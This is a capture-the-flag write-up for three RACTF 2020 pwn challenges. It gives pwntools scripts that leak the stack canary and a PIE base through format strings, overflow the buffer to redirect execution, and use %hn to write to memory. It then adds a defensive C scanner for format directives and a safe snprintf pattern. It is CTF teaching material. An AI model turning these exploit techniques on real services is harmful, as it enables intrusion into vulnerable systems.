RACTF 2020 - Pwn Category (Pwn)

![](https://media.giphy.com/media/UUycSG6B21KXizJJ6S/giphy.gif)

# Finches in a stack

```py
#!/usr/bin/python
from pwn import *

FLAG_ADDR = 0x80491d2

r = remote("88.198.219.20", 23358)

# Leak the stack canary: the 11th positional argument of the format string
# is the canary slot, so "%11$p" prints it back as "0x........".
r.sendline("%11$p")
buff = r.recvuntil("Do YOU want to pet my canary")
buff = buff[buff.find('0x'):]
ssp = int(buff[:buff.find('!')], 0)

# Overflow up to the canary, put the leaked canary back in place so the
# stack protector check passes, then overwrite the saved EIP with the
# address of the flag function.
payload = ('A' * 25) + p32(ssp) + ('A' * 12) + p32(FLAG_ADDR)
r.sendline(payload)
print(r.recvall())
r.close()
```

![](https://snipboard.io/AnDJri.jpg)

# Finches in a PIE

```py
#!/usr/bin/python
from pwn import *

r = remote("88.198.219.20", 49417)

# Offsets inside the position-independent binary: the saved return address
# that %15$p leaks, and the flag function, both relative to the image base.
SAVED_EIP = 0x13d9
FLAG_ADDR = 0x1209

# Leak the canary (%11$p) and a code pointer (%15$p) in one round trip.
r.sendline("%11$p,%15$p")
buff = r.recvuntil("Would you like some cake?")
buff = buff[buff.find("0x"):]
leaks = list(map(lambda s: int(s, 0), buff[:buff.find('!')].split(',')))
ssp = leaks[0]

# Rebase: leaked return address - its known offset = image base; add the
# flag function offset to get its runtime address.
eip = (leaks[1] - SAVED_EIP) + FLAG_ADDR
print("[+] SSP: {:#x}\n[+] EIP: {:#x}".format(ssp, eip))

# Same layout as "Finches in a stack": padding, restored canary, padding,
# then the rebased flag address over the saved EIP.
payload = ('A' * 25) + p32(ssp) + ('A' * 12) + p32(eip)
r.sendline(payload)
print(r.recvall())
r.close()
```

![](https://snipboard.io/Fhq4B3.jpg)

# Not Really AI

```py
#!/usr/bin/python
from pwn import *

r = remote("88.198.219.20", 20999)

# Two 16-bit writes with %hn. The two target addresses are placed at the
# start of the buffer (arguments 4 and 5 of the format string); the width
# fields grow printf's character count to the two half-words to write:
#   8 + 2044         = 2052  = 0x0804 -> written to 0x804c01a
#   2052 + 35393     = 37445 = 0x9245 -> written to 0x804c018
payload = p32(0x804c01a) + p32(0x804c018) + "%2044d%4$hn%35393d%5$hn"
r.sendline(payload)
print(r.recvall())
r.close()
```

![](https://snipboard.io/SVI41b.jpg)
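All three solutions above depend on the same root cause: the service hands user text to a printf-family function as the format argument, so `%11$p` reads stack slots and `%4$hn` writes to memory. The following C is an added example, not code from the writeup or the challenge binaries. It shows the two things a defender wants on the other side of this bug: a scanner that flags conversion directives (including positional `%N$` forms and the `%n` write family) in untrusted input so the attempt can be logged or rejected, and the safe call shape, where the untrusted text is only ever a `%s` argument. The function names `next_directive`, `count_format_directives`, `has_write_directive` and `safe_echo` are hypothetical, and the sample inputs are the payload strings from this page plus a couple of constructed benign strings.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Added example (not from the writeup). Advance *pp past one directive
 * starting at '%'. Returns the conversion character, '%' for an escaped
 * percent, or 0 if the string ends inside the directive. */
static char next_directive(const char **pp) {
    const char *p = *pp + 1;                         /* skip the '%' */
    if (*p == '%') { *pp = p + 1; return '%'; }      /* "%%" is literal */
    while (isdigit((unsigned char)*p)) p++;          /* positional index */
    if (*p == '$') p++;
    while (*p && strchr("-+ #0", *p)) p++;           /* flags */
    while (isdigit((unsigned char)*p) || *p == '*') p++;   /* width */
    if (*p == '.') {                                 /* precision */
        p++;
        while (isdigit((unsigned char)*p) || *p == '*') p++;
    }
    while (*p && strchr("hlLqjzt", *p)) p++;         /* length modifiers */
    char conv = *p;
    *pp = conv ? p + 1 : p;
    return conv;
}

/* Number of conversion directives in s; "%%" does not count. A trailing
 * lone '%' counts as one, since it is still undefined for printf. */
int count_format_directives(const char *s) {
    int n = 0;
    const char *p = s;
    while (*p) {
        if (*p != '%') { p++; continue; }
        char c = next_directive(&p);
        if (c == 0) { n++; break; }
        if (c != '%') n++;
    }
    return n;
}

/* 1 if s contains a %n-family directive (with any length modifier), the
 * only conversion that makes a format string write memory. */
int has_write_directive(const char *s) {
    const char *p = s;
    while (*p) {
        if (*p != '%') { p++; continue; }
        if (next_directive(&p) == 'n') return 1;
    }
    return 0;
}

/* The correct call shape: untrusted text goes through "%s", never as the
 * format itself. Returns the length snprintf reports. Compiling with
 * -Wformat-security makes the vulnerable shape, printf(untrusted), a
 * warning. */
int safe_echo(char *out, size_t cap, const char *untrusted) {
    return snprintf(out, cap, "%s", untrusted);
}

int main(void) {
    /* Constructed sample inputs: the page's payloads and benign strings. */
    const char *samples[] = {
        "%11$p", "%11$p,%15$p", "%2044d%4$hn%35393d%5$hn",
        "Hello, 100%% done", "just a name",
    };
    char out[64];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        safe_echo(out, sizeof out, samples[i]);
        printf("%-28s directives=%d write=%d echoed=\"%s\"\n", samples[i],
               count_format_directives(samples[i]),
               has_write_directive(samples[i]), out);
    }
    return 0;
}
```

The scanner is a detection and triage aid, not a substitute for the fix: the `%s` call shape removes the bug regardless of input, while the scanner lets a service log or refuse input that looks like a probe.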